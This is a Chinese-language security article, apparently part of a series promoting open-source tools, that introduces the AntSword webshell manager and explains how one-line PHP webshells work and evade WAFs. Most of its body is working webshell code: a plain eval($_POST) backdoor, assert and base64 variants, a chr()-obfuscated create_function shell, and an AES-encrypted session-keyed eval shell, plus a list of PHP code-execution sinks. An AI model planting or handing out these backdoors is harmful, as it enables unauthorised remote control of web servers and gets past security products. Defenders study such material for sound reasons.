404星链计划 | 蚁剑绕WAF进化图鉴
404星链计划即将迎来改版更新啦,我们会在项目展示、奖励计划等方面有所优化调整,同时会新收录几个优秀的开源安全工具。在此之前,让我们一同回顾一下星链计划自2020年8月上线以来我们收录过的部分项目,它们中很多已经为大家熟知,成为日常工作的一部分,有些还有待你去探索新的利用方式~ 今天介绍的项目是AntSword。
另外欢迎加入404星链计划社群,请在文末识别运营同学二维码,添加时备注“星链计划”。
项目名称:AntSword
项目作者:Medicean
项目地址:
https://github.com/AntSwordProject/antSword
背景
一句话 WebShell 原理
这个东西我写过不止一遍了,今天还要拿出来再热一热剩饭
<?php eval($_POST['ant']);?><?php var_dump(md5(123));?>一句话 WebShell 的攻防
<?php$a="assert";$$a($_POST['cmd']);?><?php$a=base64_decode("YXNzZXJ0");$$a($_POST['cmd']);?><?php$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?>evalpreg_replace 函数中的 /e 修饰符 create_functionassert //PHP7没了,PHP5直接明文传 payload 会因为引号问题执行不成功call_user_funccall_user_func_arrayusortuksortarray_maparray_walkarray_filter$a($b) // 动态组装代码执行unserialize //反序列化导致代码执行提一嘴子,D盾、云锁等安全防护产品说的 「免疫一句话 WebShell」 就是基于这个原理来的。任你一句话再怎么变形,最终还是逃不过这道门。
<?php @eval(base64_decode($_POST['ant']));?><?php@session_start();$pwd='ant';$key=@substr(str_pad(session_id(),16,'a'),0,16);@eval(openssl_decrypt(base64_decode($_POST[$pwd]), 'AES-128-ECB', $key, OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING));?>404星链计划 |GShark:多平台的敏感信息监测工具
404星链计划 | CDK:一款针对容器场景的多功能渗透工具